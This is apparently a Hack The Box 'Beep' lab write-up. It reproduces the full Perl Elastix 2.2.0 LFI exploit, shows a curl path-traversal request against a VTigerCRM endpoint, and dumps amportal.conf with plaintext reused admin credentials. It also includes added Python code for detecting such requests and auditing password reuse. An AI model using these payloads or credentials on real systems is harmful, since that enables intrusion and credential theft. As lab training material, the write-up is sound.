LFI


┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ searchsploit Elastix Local File Inclusion
------------------------------------------------------------- ---------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ---------------------------------
Elastix 2.2.0 - 'graph.php' Local File Inclusion             | php/webapps/37637.pl
------------------------------------------------------------- ---------------------------------
shellcodes: No Results
papers: No Results

There was also an LFI vulnerability for Elastix. This is a spray-and-pray situation, as I have not confirmed the version of Elastix.

Exploit


┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ searchsploit -x php/webapps/37637.pl
  Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
      URL: https://www.exploit-db.com/exploits/37637
     Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl
    Codes: N/A
 Verified: True
File Type: ASCII text
source: https://www.securityfocus.com/bid/55078/info
 
Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
 
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
 
Elastix 2.2.0 is vulnerable; other versions may also be affected.
 
#!/usr/bin/perl -w
 
#------------------------------------------------------------------------------------#
#Elastix is an Open Source Sofware to establish Unified Communications.
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------#
############################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;)
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/
 
print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki   \n";
print "\t 0day Elastix 2.2.0  \n";
print "\t email: anonymous17hacker{}gmail.com \n";
 
#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
 
use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);
$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";
 
$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~ 'This file is part of FreePBX') {
 
print "\n read amportal.conf file : $answer \n\n";
print " successful read\n";
 
}
else {
print "\n[-] not successful\n";
	}

It would appear that /etc/amportal.conf, the file the exploit reads through the current_language parameter (the trailing %00 and &module=Accounts&action are part of the request, not the file name), contains important information.
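The two vtigercrm requests in this writeup share a recognisable shape: a `../` chain, a `%00` null byte, and the path of a sensitive file in a query parameter. As an added defender-side example, not part of the original writeup, here is a small Python scanner that flags such requests in Apache combined-format access-log lines; the log lines, IPs and timestamps are constructed samples, and the parameter names mirror the ones used on this page.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format log lines (sample data, not from the target); the
# first two mirror the vtigercrm request shapes used in this writeup.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.10.14.5 - - [01/Jan/2024:10:00:07 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 3311 "-" "curl/7.88.1"
10.10.14.9 - - [01/Jan/2024:10:01:00 +0000] "GET /vtigercrm/index.php?module=Accounts&action=index HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
10.10.14.9 - - [01/Jan/2024:10:01:30 +0000] "GET /vtigercrm/graph.php?current_language=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Combined log format: client ident user [timestamp] "METHOD target PROTO" status ...
REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
# Files whose disclosure through this LFI matters most (amportal.conf holds the AMP credentials).
SENSITIVE_PATHS = ("etc/amportal.conf", "etc/passwd", "etc/shadow", "etc/asterisk/")


def decode_fully(value, rounds=3):
    """Peel repeated URL encoding so double-encoded traversal (%252e%252e%252f) is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_request(target):
    """Return the LFI indicators found in a request target, tagged with the parameter name."""
    indicators = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_fully(raw)  # parse_qsl decoded one layer already; peel the rest
        if TRAVERSAL_RE.search(value):
            indicators.append(f"traversal:{name}")
        if "\x00" in value:  # null byte truncates whatever the script appends to the path
            indicators.append(f"nullbyte:{name}")
        if any(path in value for path in SENSITIVE_PATHS):
            indicators.append(f"sensitive_path:{name}")
    return indicators


def scan_log(text):
    """Return (client_ip, status, indicators, target) for each line carrying an LFI indicator."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if m and (found := analyze_request(m["target"])):
            hits.append((m["ip"], int(m["status"]), found, m["target"]))
    return hits
```

A 200 status on a flagged request is the case worth escalating, since it means the include most likely succeeded.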

Fail


┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ perl 37637.pl
	 Elastix 2.2.0 LFI Exploit 
	 code author cheki   
	 0day Elastix 2.2.0  
	 email: anonymous17hacker{}gmail.com 
 
 target: https://ip 10.10.10.7
 
[-] not successful

The exploit itself does not work, likely implying that the running instance of Elastix isn't 2.2.0.

But …

Success through VTigerCRM LFI


As the exploit code suggests, /etc/amportal.conf (the file behind the /etc/amportal.conf%00&module=Accounts&action request) appears to contain valuable information.

Upon looking it up on Google, I found out that the amportal.conf file is the configuration file used by the Asterisk Management Portal (AMP) in Elastix. The file contains various settings for AMP, such as the database connection information, the login credentials for the AMP web interface, and other system-wide settings. In general, this file contains sensitive information such as credentials and settings, and should be protected and only accessible by authorized personnel.

Since I have a valid LFI in VTiger CRM, I may be able to read the file through that.

┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ curl -s --insecure 'https://beep.localdomain/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00&module=Accounts&action' | grep -i -v '^#'
 
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
 
AMPBIN=/var/lib/asterisk/bin
AMPSBIN=/usr/local/sbin
 
AMPWEBROOT=/var/www/html
AMPCGIBIN=/var/www/cgi-bin 
 
FOPWEBROOT=/var/www/html/panel
FOPPASSWORD=jEhdIekWmdjE
 
 
ARI_ADMIN_USERNAME=admin
 
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
 
AUTHTYPE=database
 
AMPADMINLOGO=logo.png
 
 
AMPEXTENSIONS=extensions
 
ENABLECW=no
 
ZAP2DAHDICOMPAT=true
 
 
 
 
MOHDIR=mohmp3
 
AMPMODULEXML=http://mirror.freepbx.org/
 
AMPMODULESVN=http://mirror.freepbx.org/modules/
 
AMPDBNAME=asterisk
 
ASTETCDIR=/etc/asterisk
ASTMODDIR=/usr/lib/asterisk/modules
ASTVARLIBDIR=/var/lib/asterisk
ASTAGIDIR=/var/lib/asterisk/agi-bin
ASTSPOOLDIR=/var/spool/asterisk
ASTRUNDIR=/var/run/asterisk
ASTLOGDIR=/var/log/asterisk

It worked. The file indeed contains the DB connection information, including the credential asteriskuser:jEhdIekWmdjE. It also contains the admin credential for the web GUI, admin:jEhdIekWmdjE. There is password reuse.

I am now able to log in to the Elastix admin GUI panel.

The same goes for FreePBX.
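The reuse the file reveals is the real finding: one value unlocks the database, the Asterisk manager, the operator panel and the ARI portal. As an added audit example, not part of the original writeup, the following Python parses an amportal.conf-style file (constructed here with placeholder values, not the credentials above) and reports every password value shared by more than one key, together with the services each shared value unlocks; the key-to-service mapping is my own assumption, not something the page states.

```python
import re

# Constructed amportal.conf excerpt with placeholder values (not the page's real credentials);
# the key names are the ones the file on this page actually uses.
SAMPLE_CONF = """\
# /etc/amportal.conf (constructed sample)
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=ReusedSecret1
AMPMGRUSER=admin
AMPMGRPASS=ReusedSecret1
FOPPASSWORD=ReusedSecret1
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=ReusedSecret1
AUTHTYPE=database
"""

KV_RE = re.compile(r'^\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*?)\s*$')
SECRET_KEY_RE = re.compile(r'(PASS|PASSWORD|SECRET)$', re.IGNORECASE)
# Assumed mapping of credential keys to the service they unlock (my annotation, not from the page).
SERVICE_OF = {"AMPDBPASS": "MySQL", "AMPMGRPASS": "Asterisk Manager Interface",
              "FOPPASSWORD": "Flash Operator Panel", "ARI_ADMIN_PASSWORD": "ARI admin portal"}


def parse_conf(text):
    """Parse KEY=VALUE lines, skipping blanks and # comments (the format amportal.conf uses)."""
    conf = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = KV_RE.match(line)
        if m:
            conf[m.group(1)] = m.group(2)
    return conf


def find_reused_secrets(conf):
    """Map each password value used by more than one key to the list of keys sharing it."""
    by_value = {}
    for key, value in conf.items():
        if value and SECRET_KEY_RE.search(key):
            by_value.setdefault(value, []).append(key)
    return {v: keys for v, keys in by_value.items() if len(keys) > 1}


def blast_radius(reused):
    """For each shared value, list the services a single leak of that value would unlock."""
    return {v: [SERVICE_OF.get(k, k) for k in keys] for v, keys in reused.items()}
```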